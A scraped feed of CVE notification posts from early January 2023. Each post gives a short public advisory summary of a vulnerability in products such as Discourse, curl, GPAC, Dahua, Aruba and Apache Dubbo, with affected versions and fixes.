🚨 CVE-2023-22454Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, pending post titles can be used for cross-site scripting attacks. Pending posts can be created by unprivileged users when a category has the "require moderator approval of all new topics" setting set. This vulnerability can lead to a full XSS on sites which have modified or disabled Discourse’s default Content Security Policy. A patch is available in versions 2.8.14 and 3.0.0.beta16.🎖@cveNotify |
|
| 2023-01-05 21:29:50 |
🚨 CVE-2022-41740IBM Robotic Process Automation 20.12 through 21.0.6 could allow an attacker with physical access to the system to obtain highly sensitive information from system memory. IBM X-Force ID: 238053.🎖@cveNotify |
|
| 2023-01-05 21:29:49 |
🚨 CVE-2022-43573IBM Robotic Process Automation 20.12 through 21.0.6 is vulnerable to exposure of the name and email for the creator/modifier of platform level objects. IBM X-Force ID: 238678.🎖@cveNotify |
|
| 2023-01-05 21:29:46 |
🚨 CVE-2022-43844IBM Robotic Process Automation for Cloud Pak 20.12 through 21.0.3 is vulnerable to broken access control. A user is not correctly redirected to the platform log out screen when logging out of IBM RPA for Cloud Pak. IBM X-Force ID: 239081.🎖@cveNotify |
|
| 2023-01-05 21:29:45 |
🚨 CVE-2022-4432A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS PersistenceConfigDxe driver that could allow a local attacker with elevated privileges to cause information disclosure.🎖@cveNotify |
|
| 2023-01-05 21:29:44 |
🚨 CVE-2022-4434A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS driver that could allow a local attacker with elevated privileges to cause information disclosure.🎖@cveNotify |
|
| 2023-01-05 21:29:40 |
🚨 CVE-2022-4435A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS LenovoRemoteConfigUpdateDxe driver that could allow a local attacker with elevated privileges to cause information disclosure.🎖@cveNotify |
|
| 2023-01-05 21:29:39 |
🚨 CVE-2022-42898PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."🎖@cveNotify |
|
| 2023-01-05 21:29:38 |
🚨 CVE-2022-4772A vulnerability was found in Widoco and classified as critical. Affected by this issue is the function unZipIt of the file src/main/java/widoco/WidocoUtils.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is f2279b76827f32190adfa9bd5229b7d5a147fa92. It is recommended to apply a patch to fix this issue. VDB-216914 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 20:30:00 |
🚨 CVE-2022-41740IBM Robotic Process Automation 20.12 through 21.0.6 could allow an attacker with physical access to the system to obtain highly sensitive information from system memory. IBM X-Force ID: 238053.🎖@cveNotify |
|
| 2023-01-05 20:29:59 |
🚨 CVE-2022-43844IBM Robotic Process Automation for Cloud Pak 20.12 through 21.0.3 is vulnerable to broken access control. A user is not correctly redirected to the platform log out screen when logging out of IBM RPA for Cloud Pak. IBM X-Force ID: 239081.🎖@cveNotify |
|
| 2023-01-05 20:29:58 |
🚨 CVE-2022-46168Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta15 on the `beta` and `tests-passed` branches, recipients of a group SMTP email could see the email addresses of all other users inside the group SMTP topic. Most of the time this is not an issue as they are likely already familiar with one another's email addresses. This issue is patched in versions 2.8.14 and 2.9.0.beta15. The fix is that someone sending emails out via group SMTP to non-staged users masks those emails with blind carbon copy (BCC). Staged users are ones that have likely only interacted with the group via email, and will likely include other people who were CC'd on the original email to the group. As a workaround, disable group SMTP for any groups that have it enabled.🎖@cveNotify |
|
| 2023-01-05 20:29:55 |
🚨 CVE-2022-4432A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS PersistenceConfigDxe driver that could allow a local attacker with elevated privileges to cause information disclosure.🎖@cveNotify |
|
| 2023-01-05 20:29:54 |
🚨 CVE-2022-4434A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS driver that could allow a local attacker with elevated privileges to cause information disclosure.🎖@cveNotify |
|
| 2023-01-05 20:29:53 |
🚨 CVE-2022-22576An improper authentication vulnerability exists in curl 7.33.0 to and including 7.82.0 which might allow reuse OAUTH2-authenticated connections without properly making sure that the connection was authenticated with the same credentials as set for this transfer. This affects SASL-enabled protocols: SMPTP(S), IMAP(S), POP3(S) and LDAP(S) (openldap only).🎖@cveNotify |
|
| 2023-01-05 20:29:49 |
🚨 CVE-2022-27774An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.🎖@cveNotify |
|
| 2023-01-05 20:29:48 |
🚨 CVE-2022-30260Emerson DeltaV Distributed Control System (DCS) has insufficient verification of firmware integrity (an inadequate checksum approach, and no signature). This affects versions before 14.3 of DeltaV M-series, DeltaV S-series, DeltaV P-series, DeltaV SIS, and DeltaV CIOC/EIOC/WIOC IO cards.🎖@cveNotify |
|
| 2023-01-05 20:29:44 |
🚨 CVE-2022-27779libcurl wrongly allows cookies to be set for Top Level Domains (TLDs) if thehost name is provided with a trailing dot.curl can be told to receive and send cookies. curl's "cookie engine" can bebuilt with or without [Public Suffix List](https://publicsuffix.org/)awareness. If PSL support not provided, a more rudimentary check exists to atleast prevent cookies from being set on TLDs. This check was broken if thehost name in the URL uses a trailing dot.This can allow arbitrary sites to set cookies that then would get sent to adifferent and unrelated site or domain.🎖@cveNotify |
|
| 2023-01-05 20:29:43 |
🚨 CVE-2022-4729A vulnerability was found in Graphite Web and classified as problematic. This issue affects some unknown processing of the component Template Name Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216743.🎖@cveNotify |
|
| 2023-01-05 20:29:42 |
🚨 CVE-2022-27782libcurl would reuse a previously created connection even when a TLS or SSHrelated option had been changed that should have prohibited reuse.libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse if one of them matches the setup. However, several TLS andSSH settings were left out from the configuration match checks, making themmatch too easily.🎖@cveNotify |
|
| 2023-01-05 18:30:01 |
🚨 CVE-2022-47657GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662🎖@cveNotify |
|
| 2023-01-05 18:30:00 |
🚨 CVE-2022-47658GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039🎖@cveNotify |
|
| 2023-01-05 18:29:59 |
🚨 CVE-2022-47659GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data🎖@cveNotify |
|
| 2023-01-05 18:29:57 |
🚨 CVE-2022-47660GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c🎖@cveNotify |
|
| 2023-01-05 18:29:56 |
🚨 CVE-2022-47661GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes🎖@cveNotify |
|
| 2023-01-05 18:29:51 |
🚨 CVE-2022-47662GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662🎖@cveNotify |
|
| 2023-01-05 18:29:50 |
🚨 CVE-2022-47663GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609🎖@cveNotify |
|
| 2023-01-05 18:29:49 |
🚨 CVE-2022-24118Certain General Electric Renewable Energy products allow attackers to use a code to trigger a reboot into the factory default configuration. This affects iNET and iNET II before 8.3.0, SD before 6.4.7, TD220X before 2.0.16, and TD220MAX before 1.2.6.🎖@cveNotify |
|
| 2023-01-05 18:29:48 |
🚨 CVE-2021-32563An issue was discovered in Thunar before 4.16.7 and 4.17.x before 4.17.2. When called with a regular file as a command-line argument, it delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution.🎖@cveNotify |
|
| 2023-01-05 18:29:44 |
🚨 CVE-2022-24120Certain General Electric Renewable Energy products store cleartext credentials in flash memory. This affects iNET and iNET II before 8.3.0.🎖@cveNotify |
|
| 2023-01-05 18:29:43 |
🚨 CVE-2022-4155The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2023-01-05 18:29:42 |
🚨 CVE-2014-125041A vulnerability classified as critical was found in Miccighel PR-CWT. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is e412127d07004668e5a213932c94807d87067a1f. It is recommended to apply a patch to fix this issue. VDB-217486 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 18:29:38 |
🚨 CVE-2015-10015A vulnerability, which was classified as critical, has been found in glidernet ogn-live. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is bc0f19965f760587645583b7624d66a260946e01. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217487.🎖@cveNotify |
|
| 2023-01-05 18:29:37 |
🚨 CVE-2022-46489GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the gf_isom_box_parse_ex function at box_funcs.c.🎖@cveNotify |
|
| 2023-01-05 18:29:36 |
🚨 CVE-2022-47086GPAC MP4Box v2.1-DEV-rev574-g9d5bb184b contains a segmentation violation via the function gf_sm_load_init_swf at scene_manager/swf_parse.c🎖@cveNotify |
|
| 2023-01-05 16:30:09 |
🚨 CVE-2015-10014A vulnerability classified as critical has been found in arekk uke. This affects an unknown part of the file lib/uke/finder.rb. The manipulation leads to sql injection. The name of the patch is 52fd3b2d0bc16227ef57b7b98a3658bb67c1833f. It is recommended to apply a patch to fix this issue. The identifier VDB-217485 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 16:30:08 |
🚨 CVE-2022-45995There is an unauthorized buffer overflow vulnerability in Tenda AX12 v22.03.01.21 _ cn. This vulnerability can cause the web service not to restart or even execute arbitrary code. It is a different vulnerability from CVE-2022-2414.🎖@cveNotify |
|
| 2023-01-05 16:30:07 |
🚨 CVE-2022-3840The Login for Google Apps WordPress plugin before 3.4.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-05 16:30:06 |
🚨 CVE-2022-4691Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2023-01-05 16:30:05 |
🚨 CVE-2022-4694Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2023-01-05 16:30:00 |
🚨 CVE-2022-4695Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2023-01-05 16:29:59 |
🚨 CVE-2007-10001A vulnerability classified as problematic has been found in web-cyradm. This affects an unknown part of the file search.php. The manipulation of the argument searchstring leads to sql injection. It is recommended to apply a patch to fix this issue. The identifier VDB-217449 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 16:29:58 |
🚨 CVE-2017-20162A vulnerability, which was classified as problematic, has been found in vercel ms up to 1.x. This issue affects the function parse of the file index.js. The manipulation of the argument str leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is caae2988ba2a37765d055c4eee63d383320ee662. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217451.🎖@cveNotify |
|
| 2023-01-05 16:29:57 |
🚨 CVE-2020-36641A vulnerability classified as problematic was found in gturri aXMLRPC up to 1.12.0. This vulnerability affects the function ResponseParser of the file src/main/java/de/timroes/axmlrpc/ResponseParser.java. The manipulation leads to xml external entity reference. Upgrading to version 1.12.1 is able to address this issue. The name of the patch is ad6615b3ec41353e614f6ea5fdd5b046442a832b. It is recommended to upgrade the affected component. VDB-217450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 16:29:53 |
🚨 CVE-2022-22371IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 does not invalidate session after a password change which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 221195.🎖@cveNotify |
|
| 2023-01-05 16:29:52 |
🚨 CVE-2022-43522Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the Aruba EdgeConnect Enterprise Orchestrator host in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-05 16:29:51 |
🚨 CVE-2022-43529A vulnerability in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an remote attacker to persist a session after a password reset or similar session clearing event. Successful exploitation of this vulnerability could allow an authenticated attacker to remain on the system with the permissions of their current session after the session should be invalidated in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-05 16:29:50 |
🚨 CVE-2022-43532A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x: 6.10.7 and below and ClearPass Policy Manager 6.9.x: 6.9.12 and below.🎖@cveNotify |
|
| 2023-01-05 16:29:49 |
🚨 CVE-2022-43533A vulnerability in the ClearPass OnGuard macOS agent could allow malicious users on a macOS instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the macOS instance in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x: 6.10.7 and below and ClearPass Policy Manager 6.9.x: 6.9.12 and below.🎖@cveNotify |
|
| 2023-01-05 16:29:45 |
🚨 CVE-2019-25096A vulnerability has been found in soerennb eXtplorer up to 2.1.12 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.1.13 is able to address this issue. The name of the patch is b8fcb888f4ff5e171c16797a4b075c6c6f50bf46. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217435.🎖@cveNotify |
|
| 2023-01-05 16:29:44 |
🚨 CVE-2022-47523Zoho ManageEngine Access Manager Plus before 4309, Password Manager Pro before 12210, and PAM360 before 5801 are vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-01-05 16:29:43 |
🚨 CVE-2023-22626PgHero before 3.1.0 allows Information Disclosure via EXPLAIN because query results may be present in an error message. (Depending on database user privileges, this may only be information from the database, or may be information from file contents on the database server.)🎖@cveNotify |
|
| 2023-01-05 16:29:42 |
🚨 CVE-2016-15009A vulnerability classified as problematic has been found in OpenACS bug-tracker. Affected is an unknown function of the file lib/nav-bar.adp of the component Search. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is aee43e5714cd8b697355ec3bf83eefee176d3fc3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217440.🎖@cveNotify |
|
| 2023-01-05 07:29:59 |
🚨 CVE-2022-44137SourceCodester Sanitization Management System 1.0 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-01-05 07:29:58 |
🚨 CVE-2021-4238Randomly-generated alphanumeric strings contain significantly less entropy than expected. The RandomAlphaNumeric and CryptoRandomAlphaNumeric functions always return strings containing at least one digit from 0 to 9. This significantly reduces the amount of entropy in short strings generated by these functions.🎖@cveNotify |
|
| 2023-01-05 07:29:57 |
🚨 CVE-2022-2582The AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext, if the hash is readable to the attacker. AWS now blocks this metadata field, but older SDK versions still send it.🎖@cveNotify |
|
| 2023-01-05 07:29:56 |
🚨 CVE-2022-2583A race condition can cause incorrect HTTP request routing.🎖@cveNotify |
|
| 2023-01-05 07:29:52 |
🚨 CVE-2022-45429Some Dahua software products have a vulnerability of server-side request forgery (SSRF). An Attacker can access internal resources by concatenating links (URL) that conform to specific rules.🎖@cveNotify |
|
| 2023-01-05 07:29:51 |
🚨 CVE-2022-45424Some Dahua software products have a vulnerability of unauthenticated request of AES crypto key. An attacker can obtain the AES crypto key by sending a specific crafted packet to the vulnerable interface.🎖@cveNotify |
|
| 2023-01-05 07:29:50 |
🚨 CVE-2022-45427Some Dahua software products have a vulnerability of unrestricted upload of file. After obtaining the permissions of administrators, by sending a specific crafted packet to the vulnerable interface, an attacker can upload arbitrary files.🎖@cveNotify |
|
| 2023-01-05 07:29:46 |
🚨 CVE-2022-45431Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server.🎖@cveNotify |
|
| 2023-01-05 07:29:45 |
🚨 CVE-2022-45432Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server.🎖@cveNotify |
|
| 2023-01-05 07:29:44 |
🚨 CVE-2022-45425Some Dahua software products have a vulnerability of using of hard-coded cryptographic key. An attacker can obtain the AES crypto key by exploiting this vulnerability.🎖@cveNotify |
|
| 2023-01-05 07:29:43 |
🚨 CVE-2022-45434Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.🎖@cveNotify |
|
| 2023-01-05 07:29:39 |
🚨 CVE-2022-4152The Contest Gallery WordPress plugin before 19.1.5, Contest Gallery Pro WordPress plugin before 19.1.5 do not escape the option_id POST parameter before concatenating it to an SQL query in edit-options.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2023-01-05 07:29:38 |
🚨 CVE-2019-25085A vulnerability was found in GNOME gvdb. It has been classified as critical. This affects the function gvdb_table_write_contents_async of the file gvdb-builder.c. The manipulation leads to use after free. It is possible to initiate the attack remotely. The name of the patch is d83587b2a364eb9a9a53be7e6a708074e252de14. It is recommended to apply a patch to fix this issue. The identifier VDB-216789 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 07:29:37 |
🚨 CVE-2021-35065The glob-parent package before 6.0.1 for Node.js allows ReDoS (regular expression denial of service) attacks against the enclosure regular expression.🎖@cveNotify |
|
| 2023-01-05 02:29:37 |
🚨 CVE-2022-4876A vulnerability was found in Kaltura mwEmbed up to 2.96.rc1 and classified as problematic. This issue affects some unknown processing of the file includes/DefaultSettings.php. The manipulation of the argument HTTP_X_FORWARDED_HOST leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.96.rc2 is able to address this issue. The name of the patch is 13b8812ebc8c9fa034eed91ab35ba8423a528c0b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217427.🎖@cveNotify |
|
| 2023-01-04 13:29:41 |
🚨 CVE-2023-0046Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-04 12:30:03 |
🚨 CVE-2022-39083In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:59 |
🚨 CVE-2022-39084In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:58 |
🚨 CVE-2022-39086In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:57 |
🚨 CVE-2022-39088In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:56 |
🚨 CVE-2022-39104In contacts service, there is a missing permission check. This could lead to local denial of service in Contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:55 |
🚨 CVE-2022-39118In sprd_sysdump driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2023-01-04 12:29:52 |
🚨 CVE-2022-44422In music service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:51 |
🚨 CVE-2022-44423In music service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:50 |
🚨 CVE-2022-44424In music service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-04 12:29:48 |
🚨 CVE-2022-44425In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 12:29:47 |
🚨 CVE-2022-44426In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 12:29:46 |
🚨 CVE-2022-44427In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 12:29:45 |
🚨 CVE-2022-44428In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 12:29:44 |
🚨 CVE-2022-44429In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 12:29:42 |
🚨 CVE-2022-44430In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 12:29:41 |
🚨 CVE-2022-44431In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-04 07:30:06 |
🚨 CVE-2022-4736A vulnerability was found in Venganzas del Pasado and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument the_title leads to cross site scripting. The attack may be launched remotely. The name of the patch is 62339b2ec445692c710b804bdf07aef4bd247ff7. It is recommended to apply a patch to fix this issue. VDB-216770 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-04 07:30:02 |
🚨 CVE-2022-4737A vulnerability was found in SourceCodester Blood Bank Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The identifier VDB-216773 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-04 07:30:01 |
🚨 CVE-2022-4740A vulnerability, which was classified as problematic, has been found in kkFileView. Affected by this issue is the function setWatermarkAttribute of the file /picturesPreview. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216776.🎖@cveNotify |
|
| 2023-01-04 07:30:00 |
🚨 CVE-2021-44855An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. There is Blind Stored XSS via a URL to the Upload Image feature.🎖@cveNotify |
|
| 2023-01-04 02:29:44 |
🚨 CVE-2022-42435IBM Business Automation Workflow 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, and 22.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 238054.🎖@cveNotify |
|
| 2023-01-04 02:29:42 |
🚨 CVE-2022-44036** DISPUTED ** In b2evolution 7.2.5, if configured with admins_can_manipulate_sensitive_files, arbitrary file upload is allowed for admins, leading to command execution. NOTE: the vendor's position is that this is "very obviously a feature not an issue and if you don't like that feature it is very obvious how to disable it."🎖@cveNotify |
|
| 2023-01-04 02:29:41 |
🚨 CVE-2022-42710Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS).🎖@cveNotify |
|
| 2023-01-04 00:29:57 |
🚨 CVE-2022-32637In hevc decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07491374; Issue ID: ALPS07491374.🎖@cveNotify |
|
| 2023-01-04 00:29:56 |
🚨 CVE-2022-32639In watchdog, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494487; Issue ID: ALPS07494487.🎖@cveNotify |
|
| 2023-01-04 00:29:55 |
🚨 CVE-2022-32641In meta wifi, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07453594; Issue ID: ALPS07453594.🎖@cveNotify |
|
| 2023-01-04 00:29:51 |
🚨 CVE-2022-32645In vow, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494477; Issue ID: ALPS07494477.🎖@cveNotify |
|
| 2023-01-04 00:29:50 |
🚨 CVE-2022-32647In ccu, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07554646; Issue ID: ALPS07554646.🎖@cveNotify |
|
| 2023-01-04 00:29:49 |
🚨 CVE-2022-32648In disp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06535964; Issue ID: ALPS06535964.🎖@cveNotify |
|
| 2023-01-04 00:29:45 |
🚨 CVE-2022-32651In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225857; Issue ID: ALPS07225857.🎖@cveNotify |
|
| 2023-01-04 00:29:44 |
🚨 CVE-2022-32653In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262518; Issue ID: ALPS07262518.🎖@cveNotify |
|
| 2023-01-04 00:29:40 |
🚨 CVE-2022-32658In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705059; Issue ID: GN20220705059.🎖@cveNotify |
|
| 2023-01-04 00:29:39 |
🚨 CVE-2022-32664In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Patch ID: A20220004; Issue ID: OSBNB00140929.🎖@cveNotify |
|
| 2023-01-04 00:29:38 |
🚨 CVE-2022-32665In Boa, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20220026; Issue ID: OSBNB00144124.🎖@cveNotify |
|
| 2023-01-03 20:30:13 |
🚨 CVE-2021-32824Apache Dubbo is a java based, open source RPC framework. Versions prior to 2.6.10 and 2.7.10 are vulnerable to pre-auth remote code execution via arbitrary bean manipulation in the Telnet handler. The Dubbo main service port can be used to access a Telnet Handler which offers some basic methods to collect information about the providers and methods exposed by the service and it can even allow to shutdown the service. This endpoint is unprotected. Additionally, a provider method can be invoked using the `invoke` handler. This handler uses a safe version of FastJson to process the call arguments. However, the resulting list is later processed with `PojoUtils.realize` which can be used to instantiate arbitrary classes and invoke its setters. Even though FastJson is properly protected with a default blocklist, `PojoUtils.realize` is not, and an attacker can leverage that to achieve remote code execution. Versions 2.6.10 and 2.7.10 contain fixes for this issue.🎖@cveNotify |
|
| 2023-01-03 20:30:12 |
🚨 CVE-2022-30594The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag.🎖@cveNotify |
|
| 2023-01-03 20:30:08 |
🚨 CVE-2022-37958SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2023-01-03 20:30:07 |
